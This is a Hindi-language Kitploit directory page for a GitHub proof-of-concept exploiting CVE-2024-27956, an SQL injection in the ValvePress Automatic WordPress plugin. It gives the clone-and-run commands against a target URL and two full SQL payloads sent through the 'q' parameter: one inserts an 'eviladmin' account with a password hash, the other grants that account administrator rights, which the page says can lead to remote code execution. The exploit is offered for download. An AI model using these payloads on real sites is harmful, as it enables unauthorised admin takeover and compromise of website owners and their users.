Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-27956-RCE — CVE-2024-27956 में SQL इंजेक्शन के लिए PoC | Kitploit
उपकरण/GitHubGitHub/diego-tella/cve-2024-27956-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubdiego-tella/cve-2024-27956-rce

CVE-2024-27956-RCE

CVE-2024-27956 में SQL इंजेक्शन के लिए PoC

रिपॉजिटरी देखें
90252 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-27956-RCE

CVE-2024-27956 के लिए एक PoC, ValvePress Automatic प्लगइन में एक SQL Injection। यह PoC कमजोरी का फायदा उठाकर लक्ष्य में एक उपयोगकर्ता बनाता है और उसे Administrator अधिकार देता है। wordpress में administrator होने से Remote Code Execution हो सकता है।

उपयोग

root@kitploit:~
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com

पेलोड

उपयोगकर्ता बनाने के लिए SQL Injection पेलोड:
root@kitploit:~
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')

एडमिन अधिकार देना:

root@kitploit:~
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}

q पैरामीटर में, हम अपनी पूरी क्वेरी पास कर सकते हैं और फिर यह निष्पादित हो जाएगी।

छवि उपयोगकर्ता इनपुट बिना किसी प्रतिबंध या सैनिटाइज़ेशन के सीधे निष्पादित किया जाता है।

PoC

टूल डाउनलोड करें